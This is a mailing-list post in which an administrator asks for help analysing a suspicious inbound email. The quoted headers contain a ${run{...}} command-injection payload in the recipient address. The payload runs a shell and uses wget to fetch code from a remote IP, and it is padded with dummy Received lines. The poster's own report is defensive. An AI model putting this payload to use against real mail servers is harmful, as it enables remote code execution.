possible attack against MailScanner ?

Mon Jul 15 10:58:55 UTC 2019

Hallo List,

i need some help analysing the following email, i received last week.

Mailwatch Mail-Metadata:

Received: from sab.com (unknown [46.22.132.94])
     by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
     for
<root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local>;
Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31

IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in case...
IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in case...

Versions:
MailWatch Version: 1.2.9
OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
Postfix Version: 3.1.0
MailScanner Version: 5.1.2
ClamAV Version: 0.102.0-devel-20190715
SpamAssassin Version: 3.4.2
PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
MySQL Version: 5.7.26-0ubuntu0.16.04.1

Can you help me to bring some light in this dark...

-- 
Mit freundlichen Gruessen

H. Backhaus 

Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain

--
Diese Nachricht wurde auf Viren und andere gefährliche Inhalte untersucht
und ist - aktuelle Virenscanner vorausgesetzt - sauber.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.mailscanner.info/pipermail/mailscanner/attachments/20190715/3d221ddb/attachment.html>